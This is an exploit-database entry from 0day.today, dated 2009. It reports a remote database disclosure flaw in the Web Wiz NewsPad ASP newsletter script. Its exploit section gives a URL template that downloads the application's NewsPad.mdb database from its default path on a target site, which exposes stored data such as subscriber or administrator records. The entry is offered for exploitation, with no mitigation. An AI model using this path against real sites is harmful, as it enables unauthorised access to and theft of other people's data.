id: 10379
date: 12/24/2009
title: Web Wiz NewsPad Database Disclosure Vulnerability
author: ViRuSMaN
cves: 

=================================================
Web Wiz NewsPad Database Disclosure Vulnerability
=================================================

==============================================================================
        [»] ~ Note : Some sites may change the path of the "database/NewsPad.mdb" cause the vulnerability not work
==============================================================================
        [»] Web Wiz NewsPad Remote Database Disclosure Vulnerability
==============================================================================
 
    [»] Script:             [ Web Wiz NewsPad ]
    [»] Language:           [ ASP ]
    [»] Site page:          [ Web Wiz NewsPad - Free eNewsletter Software Download ]
    [»] Download:           [ http://www.webwizguide.com/webwiznewspad/downloads.asp ]
    [»] Founder:            [ ViRuSMaN ]
 
###########################################################################
 
===[ Exploit ]===
 
    [»] http://[target].com/[path]/database/NewsPad.mdb
 
Author: ViRuSMaN <-
 
###########################################################################



#  0day.today [2023-03-24]  #